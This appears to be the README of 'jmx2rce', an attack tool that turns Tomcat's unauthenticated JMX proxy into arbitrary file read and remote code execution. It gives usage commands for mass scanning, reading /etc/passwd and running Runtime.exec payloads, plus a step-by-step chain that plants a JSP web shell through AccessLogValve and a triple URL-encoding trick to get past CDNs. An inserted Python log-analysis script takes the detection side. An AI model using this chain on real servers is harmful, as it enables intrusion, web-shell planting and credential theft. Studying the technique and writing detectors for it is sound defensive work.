jmx2rce

This tool is for authorized security testing and educational purposes only. Only use against systems you own or have explicit written permission to test. Unauthorized access to computer systems is illegal. The author is not responsible for any misuse.

Tomcat JMX Proxy to RCE via AccessLogValve Injection

A self-contained exploitation tool that chains Apache Tomcat's unauthenticated JMX proxy endpoint with AccessLogValve reconfiguration to achieve arbitrary file read and remote code execution via Expression Language (EL) injection.

Single static Go binary. No dependencies. Works on macOS, Linux, and Windows.

Requirements

  • Go 1.20+ to build from source, or use the prebuilt binary
  • No external dependencies (standard library only)

Installation

git clone https://github.com/hacktus/jmx2rce.git
cd jmx2rce/tool
go build -o jmx2rce jmx2rce.go
./jmx2rce -h

Nuclei Template

A nuclei template is included for mass scanning. Detects unauthenticated JMX proxy access and extracts the Tomcat version.

nuclei -t tomcat-jmxproxy-unauth.yaml -l targets.txt

Single host:

nuclei -t tomcat-jmxproxy-unauth.yaml -u https://target.com

Usage

Scan for Vulnerable Hosts

Detect Tomcat instances exposing unauthenticated JMX proxy endpoints.

# Scan a single host
jmx2rce scan -H target.com

# Scan from a file with 50 threads
jmx2rce scan -f targets.txt -t 50

# Save results as JSON
jmx2rce scan -f targets.txt -o results.json

# Verbose output for debugging
jmx2rce -v scan -H target.com

Arbitrary File Read

Read arbitrary files from the server by reconfiguring the ROOT webapp's docBase.

# Read /etc/passwd
jmx2rce read -H target.com -p /etc/passwd

# Read Tomcat configuration
jmx2rce read -H target.com -p /opt/tomcat/conf/server.xml

Remote Code Execution

Full RCE chain via AccessLogValve JSP injection with EL payload.

# Default proof-of-concept payload (evaluates 7*7*7 and leaks server info)
jmx2rce rce -H target.com

# Custom EL payload
jmx2rce rce -H target.com -payload '${System.getProperty("user.name")}'

# Runtime command execution (Tomcat 9+ with EL 3.0)
jmx2rce rce -H target.com -payload '${Runtime.getRuntime().exec("id")}'

Cleanup

Restore original server configuration after testing.

jmx2rce cleanup -H target.com

# If the original docBase was different from ROOT
jmx2rce cleanup -H target.com -docbase /opt/tomcat/webapps/ROOT

Global Options

-q              Suppress banner and non-essential output
-v              Full request/response logging
-verify         Enable SSL certificate verification (disabled by default)
-scheme string  URL scheme: http or https (default: https)
-header NAME:VALUE  Add custom header to all requests (repeatable)
-no-color       Disable colored output

Attack Chain Explanation

Phase 1: Discovery (scan)

The tool sends a GET request to /manager/jmxproxy/?get=Catalina:type=Server&att=serverInfo. If the JMX proxy is exposed without authentication, Tomcat returns the server version in an OK - ... response. No authentication = full JMX read/write access to all registered MBeans.

Phase 2: Arbitrary File Read (read)

  1. Save the current docBase attribute of the ROOT WebModule MBean
  2. Set docBase to the directory containing the target file (e.g., /etc)
  3. Reload the ROOT context so Tomcat serves files from the new directory
  4. GET the target file by its path relative to the new docBase (e.g., /passwd)
  5. Restore the original docBase and reload

Phase 3: Remote Code Execution (rce)

  1. Set relaxedQueryChars on the HTTPS Connector MBean to allow {} in URLs (needed for EL syntax in some configurations)
  2. Reconfigure AccessLogValve MBean:
    • directory = webapps/ROOT (write logs into the web root)
    • prefix = pwned_{timestamp} (unique filename)
    • suffix = .jsp (Tomcat will compile and execute it)
    • pattern = %{X-Payload}i (log the value of the X-Payload request header)
    • rotatable = false, buffered = false (immediate write)
  3. Invoke rotate() on the AccessLogValve to open the new .jsp log file
  4. Set ROOT docBase to webapps/ROOT and reload context
  5. Send a trigger request with the EL payload in the X-Payload header -- this gets written to the JSP file via the access log
  6. Access the JSP file -- Tomcat compiles and evaluates the EL expressions, returning the result

URL Encoding for CDN Traversal

The %{X-Payload}i AccessLogValve pattern token contains the characters %, {, and }, which CDNs and reverse proxies mangle. The tool therefore triple-encodes the value:

Target value:     %{X-Payload}i
URL parameter:    %2525%257BX-Payload%257Di

Decoding chain:
  CDN layer:      %2525 -> %25,  %257B -> %7B,  %257D -> %7D
  Tomcat layer:   %25   -> %,    %7B   -> {,    %7D   -> }
  Final value:    %{X-Payload}i

Phase 4: Cleanup (cleanup)

Restores all modified MBean attributes to their default values:

  • AccessLogValve: directory logs/, prefix localhost_access_log, suffix .txt, pattern common
  • ROOT docBase: ROOT
  • Connector: clears relaxedQueryChars
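Every phase above, and the URL-encoding trick in particular, leaves a footprint in the HTTP access logs in front of Tomcat: a hit on /manager/jmxproxy/ carrying a read command (get, qry) or a state-changing one (set, invoke), and, for the pattern change, a multiply-encoded val parameter. The Python script below is an added example written from the detection side; it is not part of jmx2rce or of Tomcat. It parses constructed access-log lines in Tomcat's default common format, classifies each jmxproxy request by command and response status, and peels percent-encoding layers off the val parameter until the text stops changing, which reproduces the decoding chain shown above (%2525%257BX-Payload%257Di, then %25%7BX-Payload%7Di, then %{X-Payload}i). Assumptions: the sample lines, client addresses and the AccessLogValve object name in them are constructed for illustration, and the set/qry/invoke command names and the att/val/op parameters are Tomcat's documented jmxproxy query syntax, not something taken from this README.

```python
"""Detection-side helper (added example, not part of jmx2rce):
flag Tomcat JMX proxy requests in access logs and fully decode
multi-layer URL-encoded attribute values."""
import re
from typing import Optional
from urllib.parse import unquote, urlsplit

JMXPROXY_PATH = "/manager/jmxproxy"
# jmxproxy commands: get/qry only read MBeans, set/invoke change server state.
COMMANDS = {"get": "read", "qry": "read", "set": "write", "invoke": "write"}

# Tomcat "common" access-log format: host ident user [time] "request" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) \S+" (?P<status>\d{3}) \S+$'
)

# Constructed sample lines (client addresses, timestamps and the AccessLogValve
# object name are illustrative). Line 2 carries the triple-encoded pattern
# value as an edge proxy in front of Tomcat would see it, before its own decode.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /manager/jmxproxy/?get=Catalina:type=Server&att=serverInfo HTTP/1.1" 200 41
203.0.113.5 - - [01/Jan/2024:10:00:01 +0000] "GET /manager/jmxproxy/?set=Catalina:type=Valve,host=localhost,name=AccessLogValve&att=pattern&val=%2525%257BX-Payload%257Di HTTP/1.1" 200 57
203.0.113.5 - - [01/Jan/2024:10:00:02 +0000] "GET /manager/jmxproxy/?invoke=Catalina:type=Valve,host=localhost,name=AccessLogValve&op=rotate HTTP/1.1" 200 35
198.51.100.7 - - [01/Jan/2024:10:00:03 +0000] "GET /index.html HTTP/1.1" 200 1024
203.0.113.5 - - [01/Jan/2024:10:00:04 +0000] "GET /manager/jmxproxy/?get=Catalina:type=Server&att=serverInfo HTTP/1.1" 401 0
"""


def decode_layers(value: str, max_layers: int = 5) -> list:
    """Percent-decode repeatedly until the text stops changing.
    Returns every stage so the caller can see how many layers were stripped."""
    stages = [value]
    for _ in range(max_layers):
        nxt = unquote(stages[-1])
        if nxt == stages[-1]:
            break
        stages.append(nxt)
    return stages


def raw_params(uri: str) -> dict:
    """Split the query string WITHOUT decoding; parse_qs would silently
    strip one encoding layer and hide the nesting."""
    params = {}
    for part in urlsplit(uri).query.split("&"):
        if part:
            key, _, val = part.partition("=")
            params[key] = val
    return params


def analyse_line(line: str) -> Optional[dict]:
    """Return a finding dict for a jmxproxy request, else None."""
    m = LOG_RE.match(line)
    if not m or not m.group("uri").startswith(JMXPROXY_PATH):
        return None
    params = raw_params(m.group("uri"))
    command = next((c for c in COMMANDS if c in params), None)
    status = int(m.group("status"))
    if status != 200:
        severity = "low"      # proxy rejected the request (e.g. 401 with auth in place)
    elif command and COMMANDS[command] == "write":
        severity = "high"     # MBean attribute changed or operation invoked
    else:
        severity = "medium"   # unauthenticated read: reconnaissance succeeded
    finding = {
        "ip": m.group("ip"),
        "status": status,
        "command": command,
        "target": params.get(command, "") if command else "",
        "attribute": params.get("att") or params.get("op", ""),
        "severity": severity,
    }
    if "val" in params:
        finding["val_stages"] = decode_layers(params["val"])
    return finding


def analyse_log(text: str) -> list:
    """Run analyse_line over every line, keeping only jmxproxy findings."""
    return [f for f in map(analyse_line, text.splitlines()) if f]


if __name__ == "__main__":
    for f in analyse_log(SAMPLE_LOG):
        print(f"[{f['severity']:6}] {f['ip']} {f['status']} {f['command']} "
              f"{f['target']} {f['attribute']}")
        for depth, stage in enumerate(f.get("val_stages", [])):
            print(f"         layer {depth}: {stage}")
```

Run it directly to print one finding per jmxproxy request; the set line is reported as high severity with its val decoded through all three stages. Responses other than 200 are scored low because the proxy refused the request, which is what a 401 from an intact manager-application login constraint looks like. The query string is split by hand because parse_qs decodes one layer on its own, which would hide exactly the nesting a reviewer needs to see.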

Example Output

Scan

$ jmx2rce scan -H vulnerable-target.example.com -timeout 10

     _____ __  ____  ___  ____  ________
    / /  |/  |/ /\ \/ / |/ _ \/ ___/ __/
 __/ / /|_/ /> <  )  /| / , _/ /__/ _/
/___/_/  /_/_/|_/_/|_|_/_/|_|\___/___/

Tomcat JMX Proxy → RCE via AccessLogValve Injection
By: hacktus

[*] Scanning 1 host(s) with 20 threads, timeout 10s
[+] vulnerable-target.example.com - VULNERABLE - Apache Tomcat/10.1.8

[+] Found 1 vulnerable host(s):
  vulnerable-target.example.com - Apache Tomcat/10.1.8

Legal Disclaimer

This tool is provided for authorized security testing and research purposes only. You must have explicit written permission from the system owner before using this tool against any target. Unauthorized access to computer systems is illegal.

The author assumes no liability for misuse of this tool. By using jmx2rce, you agree to:

  • Only test systems you own or have explicit authorization to test
  • Follow all applicable laws and regulations
  • Report any vulnerabilities found through responsible disclosure

Credits

  • Author: hacktus
  • Technique: AccessLogValve JSP injection via JMX Proxy is a well-documented Tomcat attack vector. This tool automates the full chain including CDN-safe URL encoding.
